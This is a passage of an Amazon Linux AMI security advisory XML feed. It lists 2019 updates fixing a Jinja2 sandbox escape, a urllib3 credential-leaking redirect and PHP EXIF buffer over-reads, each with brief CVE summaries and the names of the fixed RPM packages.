name="perf" version="4.14.123" release="86.109.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.123-86.109.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1223</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1223: important priority package update for python-jinja2</title><issued date="2019-06-11 22:37:00" /><updated date="2019-06-13 18:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-10745:
In Pallets Jinja before 2.8.1, str.format allows a sandbox escape.
1698345:
CVE-2016-10745 python-jinja2: Sandbox escape due to information disclosure via str.format
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10745" title="" id="CVE-2016-10745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-jinja2" version="2.7.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-jinja2-2.7.2-3.16.amzn1.noarch.rpm</filename></package><package name="python27-jinja2" version="2.7.2" release="3.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-jinja2-2.7.2-3.16.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1224</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1224: low priority package update for python-urllib3</title><issued date="2019-06-11 22:41:00" /><updated date="2019-06-13 18:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20060:
urllib3 before version 1.23 does not remove the Authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the Authorization header to be exposed to unintended hosts or transmitted in cleartext.
1649153:
CVE-2018-20060 python-urllib3: Cross-host redirect does not remove Authorization header, allowing credential exposure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20060" title="" id="CVE-2018-20060" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-urllib3" version="1.24.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-urllib3-1.24.1-1.6.amzn1.noarch.rpm</filename></package><package name="python26-urllib3" version="1.24.1" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-urllib3-1.24.1-1.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1225</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1225: low priority package update for php71 php72 php73</title><issued date="2019-06-11 23:00:00" /><updated date="2019-06-13 18:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11036:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.29, 7.2.x below 7.2.18 and 7.3.x below 7.3.5 can be caused to read past allocated buffer in exif_process_IFD_TAG function. This may lead to information disclosure or crash.
1707299:
CVE-2019-11036 php: buffer over-read in exif_process_IFD_TAG function leading to information disclosure
CVE-2019-11035:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.28, 7.2.x below 7.2.17 and 7.3.x below 7.3.4 can be caused to read past allocated buffer in exif_iif_add_value function. This may lead to information disclosure or crash.
1702246:
CVE-2019-11035 php: heap buffer overflow in function exif_iif_add_value
CVE-2019-11034:
When processing certain files, PHP EXIF extension in versions 7.1.x below 7.1.28, 7.2.x below 7.2.17 and 7.3.x below 7.3.4 can be caused to read past allocated buffer in exif_process_IFD_TAG function. This may lead to information disclosure or crash.
1702256:
CVE-2019-11034 php: heap buffer overflow in function exif_process_IFD_TAG
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11034" title="" id="CVE-2019-11034" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11035" title="" id="CVE-2019-11035" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11036" title="" id="CVE-2019-11036" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-embedded" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.18" release="1.13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-ldap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.18" 
release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.18" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.18" release="1.13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-gd-7.2.18-1.13.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.18" release="1.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-tidy-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.18" release="1.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-fpm-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.18" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.18-1.13.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.29" release="1.39.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" 
version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.29" release="1.39.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-pspell-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.29" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.29-1.39.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.29" release="1.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-opcache-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.29" release="1.39.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-pgsql-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.29" 
release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.29" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.29-1.39.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" 
version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-gd" 
